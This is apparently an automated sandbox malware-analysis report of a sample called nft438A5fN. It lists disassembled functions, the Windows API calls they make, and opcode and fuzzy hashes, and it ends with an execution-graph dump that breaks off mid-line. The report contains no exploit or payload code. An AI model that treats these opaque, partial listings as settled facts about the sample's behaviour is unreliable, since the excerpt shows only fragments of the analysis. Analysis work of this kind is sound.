                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileModuleName$LoadQueryStringVirtual
                                                                      • String ID:
                                                                      • API String ID: 3990497365-0
                                                                      • Opcode ID: 52ea8ddc3392cd59fe8a81fd45fc2b797c81e21a32922a55d7e571da8eacd287
                                                                      • Instruction ID: 3cb2a6045ea6331dad19cb6158588aa248fca632e5056f26dcf5791190ee2d5f
                                                                      • Opcode Fuzzy Hash: 52ea8ddc3392cd59fe8a81fd45fc2b797c81e21a32922a55d7e571da8eacd287
                                                                      • Instruction Fuzzy Hash: 3B412971A40258ABDF61EB68CC88BDAB7FDAB48304F4401E5A548E7241DB74AF94DF90
                                                                      Function 02D50E73 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 02D50E8A
                                                                        • Part of subcall function 02D514C2: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 02D514F1
                                                                        • Part of subcall function 02D514C2: ___AdjustPointer.LIBCMT ref: 02D5150C
                                                                      • _UnwindNestedFrames.LIBCMT ref: 02D50EA1
                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 02D50EB3
                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 02D50ED7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                      • String ID:
                                                                      • API String ID: 2901542994-0
                                                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                      • Instruction ID: 0bd8873804af4ab52c6649c7515a57212fdb5039b8677e53e40188f034f3cd0a
                                                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                      • Instruction Fuzzy Hash: 9E01B332000119ABCF129F55CC00EAA7BAAEB59755F158414FD5866220C7B6E861DFA0
                                                                      Function 02D50541 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 02D50541
                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 02D50546
                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 02D5054B
                                                                        • Part of subcall function 02D51A4A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 02D51A5B
                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 02D50560
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                      • String ID:
                                                                      • API String ID: 1761009282-0
                                                                      • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                      • Instruction ID: e8ae23e2042f7064f409eebdba967e78292ddf82981404945ff435458ed0de74
                                                                      • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                      • Instruction Fuzzy Hash: C4C048184082B5A86C12BAB422407AD031A9CAE38AF8024C09CBD273068ED6CC0BDC72
                                                                      Function 02D1B15B Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 234COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: e~E$NG
                                                                      • API String ID: 3519838083-1735957280
                                                                      • Opcode ID: 877520488350caf044840e68d165166ca8221db523610587b081686920612f7b
                                                                      • Instruction ID: f3afa22811a0c984ec43b4b72810d37f0fd3d227c3cfde7cfefb50dd7e6278b1
                                                                      • Opcode Fuzzy Hash: 877520488350caf044840e68d165166ca8221db523610587b081686920612f7b
                                                                      • Instruction Fuzzy Hash: C16175A3B0421477DB04AE66ED7596FB6DBEFD4758F08092DB446D3B40D924CD08CAA2
                                                                      Function 02D629CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __fassign
                                                                      • String ID: PkGNG
                                                                      • API String ID: 3965848254-263838557
                                                                      • Opcode ID: df6090bc8f26b7e29a48799c2f63ef8664aacbe2c579135c1419eb37ea41631a
                                                                      • Instruction ID: cd6e9741b4c30e044c9421e7813dead833c78550126b6c898165b3a82526d763
                                                                      • Opcode Fuzzy Hash: df6090bc8f26b7e29a48799c2f63ef8664aacbe2c579135c1419eb37ea41631a
                                                                      • Instruction Fuzzy Hash: 1A519071A00249AFDB10CFA8D889AFEBBF8EF09300F14456AE955E7391E7709D40CB65
                                                                      Function 02D3363C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _memcmp_wcslen
                                                                      • String ID: ?
                                                                      • API String ID: 1846113162-1684325040
                                                                      • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                      • Instruction ID: 974250d21c6eacd87eb974b3ab5b76ebb0cae9a93814c9403679be573691bb23
                                                                      • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                      • Instruction Fuzzy Hash: 8B4192B1504356AFDB61DF60DD48AABB7ECEB84745F00096AF545C2261EB70CD48CBD2
                                                                      Function 02D32CAB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: 8SG$@ouu
                                                                      • API String ID: 176396367-2912095163
                                                                      • Opcode ID: bba1c72303a92f5c67287bcd5b8cf3608eb88736a3519e3ce1e560bda5bf68a7
                                                                      • Instruction ID: d02ce216a007445eb05132ee76c5a611afd025e6ed55a2e76e8ed16dc7d79b7e
                                                                      • Opcode Fuzzy Hash: bba1c72303a92f5c67287bcd5b8cf3608eb88736a3519e3ce1e560bda5bf68a7
                                                                      • Instruction Fuzzy Hash: 4721B662B002147BDF04BAB4ECA5EFD366FCF94324F10047EE406A7381EE299D098A75
                                                                      Function 02D1929B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strftime
                                                                      • String ID: dMG$|MG
                                                                      • API String ID: 1867682108-1683252805
                                                                      • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                                      • Instruction ID: 2e09bdc2aa9b399c81c15aeb76c37196890e15f0872e76c150048ce0005a5ea9
                                                                      • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                                      • Instruction Fuzzy Hash: F8318471504301AFD724EB60FD61AEE77A6EB94310F004439E149826E0EF749E49CF6A
                                                                      Function 02C91C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6c0ba1e004557d540f487a1608ea8381c058648c682f50c094c3f584b10274e6
                                                                      • Instruction ID: 6ad0cf25923a21d43f8048ae9886d2e46321208ad148804fc62670a54334899a
                                                                      • Opcode Fuzzy Hash: 6c0ba1e004557d540f487a1608ea8381c058648c682f50c094c3f584b10274e6
                                                                      • Instruction Fuzzy Hash: F1A1F7777106060BDF19AA7C9C8E3ADB3C69BC4325F1C427ED11DCB381DBE58A429690
                                                                      Function 02C994EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02C995DA), ref: 02C99572
                                                                      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02C995DA), ref: 02C99578
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DateFormatLocaleThread
                                                                      • String ID: yyyy
                                                                      • API String ID: 3303714858-3145165042
                                                                      • Opcode ID: 3724ac29d5bfa20cba3f077bfff0a347cea8c2a68d2113f40373991ffa85f714
                                                                      • Instruction ID: 13291fc926fe9a68916a2f16fed1299891b5bb9110ee2c9be81102a77f72bccc
                                                                      • Opcode Fuzzy Hash: 3724ac29d5bfa20cba3f077bfff0a347cea8c2a68d2113f40373991ffa85f714
                                                                      • Instruction Fuzzy Hash: CA219271A002589FDF24DFA8C889AAFB3B9EF49700F5101AAE805E7250E730DF40DB65
                                                                      Function 02D1BB97 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: o~E$NG
                                                                      • API String ID: 3519838083-4065726910
                                                                      • Opcode ID: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                                      • Instruction ID: c5d79fa9b541b98973b5592765814d7c6392a6cf553544d9b7ffb5e674ad315a
                                                                      • Opcode Fuzzy Hash: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                                      • Instruction Fuzzy Hash: 60216772D001086BDB14F7A4F865AFE7776EF94320F20416AE516A3690DF341E05CF65
                                                                      Function 02CA8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CA83C2), ref: 02CA83A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                      • String ID: FlushInstructionCache$Kernel32
                                                                      • API String ID: 3811539418-184458249
                                                                      • Opcode ID: 3ef4df6b5a3b8705fb92a97d428924a9f827c4d72874e78334f03519d58b8567
                                                                      • Instruction ID: 2cc7d1384b98158b4d8563b32e7641cf35726f588620e36a80eed9aa1a420cc1
                                                                      • Opcode Fuzzy Hash: 3ef4df6b5a3b8705fb92a97d428924a9f827c4d72874e78334f03519d58b8567
                                                                      • Instruction Fuzzy Hash: 5A0169B1780309BFEB14EFA4DC61F5AB7EEEB09B04F518460B909D6B50D670AD119A24
                                                                      Function 02D25D6A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02D4BD91: __onexit.LIBCMT ref: 02D4BD97
                                                                      • __Init_thread_footer.LIBCMT ref: 02D284F4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Init_thread_footer__onexit
                                                                      • String ID: ,kG$0kG
                                                                      • API String ID: 1881088180-2015055088
                                                                      • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                      • Instruction ID: 96b7f4d86d20d67e1deb0c4cfa771c5f289b170bb75025ccb16b5d711e79a9c8
                                                                      • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                      • Instruction Fuzzy Hash: 47E0D8315009308FC104A328D540A4537D7DB2A728F11802BD408D73D0CF1AAC46CD7D
                                                                      Function 02CAAF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAAF58
                                                                      • IsBadWritePtr.KERNEL32(?,00000004), ref: 02CAAF88
                                                                      • IsBadReadPtr.KERNEL32(?,00000008), ref: 02CAAFA7
                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAAFB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Read$Write
                                                                      • String ID:
                                                                      • API String ID: 3448952669-0
                                                                      • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                      • Instruction ID: 4271b08f626c575bd2f13c5acec2e174baf01efeb776c280ab5252d4dd0d663b
                                                                      • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                      • Instruction Fuzzy Hash: 3921B4B264061A9FDF14DF69CC80BAE73B9EF80359F104512FE1497380D739E911CAA4

                                                                      Execution Graph

                                                                      Execution Coverage:3.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0.5%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:11
                                                                      execution_graph 18436 56903 18437 5690f 18436->18437 18438 56934 18437->18438 18439 5693b Sleep 18437->18439 18440 56953 _amsg_exit 18438->18440 18442 5695d 18438->18442 18439->18437 18440->18442 18441 5699f _initterm 18446 569ba __IsNonwritableInCurrentImage 18441->18446 18442->18441 18444 56980 18442->18444 18442->18446 18450 509b1 GetCurrentThreadId OpenThread 18446->18450 18509 4e2af 18450->18509 18452 509e8 HeapSetInformation RegOpenKeyExW 18453 5e9c5 RegQueryValueExW RegCloseKey 18452->18453 18454 50a18 18452->18454 18457 5e9f5 18453->18457 18519 51f5b 18454->18519 18672 463bd 18457->18672 18460 50a41 18532 487ca 8 API calls 18460->18532 18465 5ea08 18495 50a87 18465->18495 18687 51e70 18465->18687 18469 5ea58 _setjmp3 18470 5ea82 18469->18470 18471 5ea6f 18469->18471 18473 5eaa4 18470->18473 18476 463bd 448 API calls 18470->18476 18471->18470 18472 5ea73 18471->18472 18475 51e70 448 API calls 18472->18475 18483 5ea3c 18472->18483 18693 4dd98 _get_osfhandle GetFileType 18473->18693 18475->18472 18479 5ea92 18476->18479 18477 5ea52 18477->18469 18478 5eab1 18481 5eab5 _setmode 18478->18481 18482 5eac6 18478->18482 18480 64840 453 API calls 18479->18480 18484 5ea9a 18480->18484 18481->18482 18698 562c0 18482->18698 18484->18473 18487 51e70 448 API calls 18484->18487 18487->18484 18488 5eacc EnterCriticalSection LeaveCriticalSection 18491 4c570 581 API calls 18488->18491 18490 50ada exit 18490->18495 18497 5eafa 18491->18497 18493 4e2af 4 API calls 18493->18495 18494 51e70 448 API calls 18494->18495 18495->18477 18495->18490 18495->18494 18496 5ea32 18495->18496 18598 4e310 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 18495->18598 18607 4c570 18495->18607 18623 4e470 18495->18623 18496->18483 18499 51e70 448 API calls 18496->18499 18497->18488 18500 5eb75 18497->18500 18501 5eb06 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo 18497->18501 18499->18496 18500->18483 18503 51e70 448 API calls 18500->18503 18502 4e2af 4 API calls 18501->18502 18504 5eb40 18502->18504 18503->18500 18505 4e470 918 API calls 18504->18505 18506 4e310 12 API calls 18504->18506 18505->18504 18507 5eb54 GetConsoleOutputCP GetCPInfo 18506->18507 18508 4e2af 4 API calls 18507->18508 18508->18497 18510 4e2bc SetThreadUILanguage 18509->18510 18511 4e2ca 18509->18511 18510->18452 18512 4e2d4 GetModuleHandleW 18511->18512 18513 